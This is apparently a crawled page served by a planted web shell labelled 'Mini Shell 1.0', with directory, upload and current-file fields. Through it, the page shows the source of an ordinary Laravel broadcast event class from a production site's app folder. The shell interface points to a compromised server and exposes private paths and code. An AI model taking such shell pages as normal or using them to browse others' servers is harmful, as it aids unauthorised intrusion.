HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/devs.lapieza.net/app/Events/
Upload File :
Current File : /var/www/devs.lapieza.net/app/Events/AcceptServiceWorkshopProposalEvent.php
<?php



namespace App\Events;



use Illuminate\Broadcasting\Channel;

use Illuminate\Broadcasting\InteractsWithSockets;

use Illuminate\Broadcasting\PresenceChannel;

use Illuminate\Broadcasting\PrivateChannel;

use Illuminate\Contracts\Broadcasting\ShouldBroadcast;

use Illuminate\Foundation\Events\Dispatchable;

use Illuminate\Queue\SerializesModels;



class AcceptServiceWorkshopProposalEvent

{

    use Dispatchable, InteractsWithSockets, SerializesModels;



    public $workshopServiceProposal;



    /**

     * Create a new event instance.

     *

     * @return void

     */

    public function __construct($workshopServiceProposal)

    {

        $this->workshopServiceProposal = $workshopServiceProposal;

    }



    /**

     * Get the channels the event should broadcast on.

     *

     * @return \Illuminate\Broadcasting\Channel|array

     */

    public function broadcastOn()

    {

        return new PrivateChannel('channel-name');

    }

}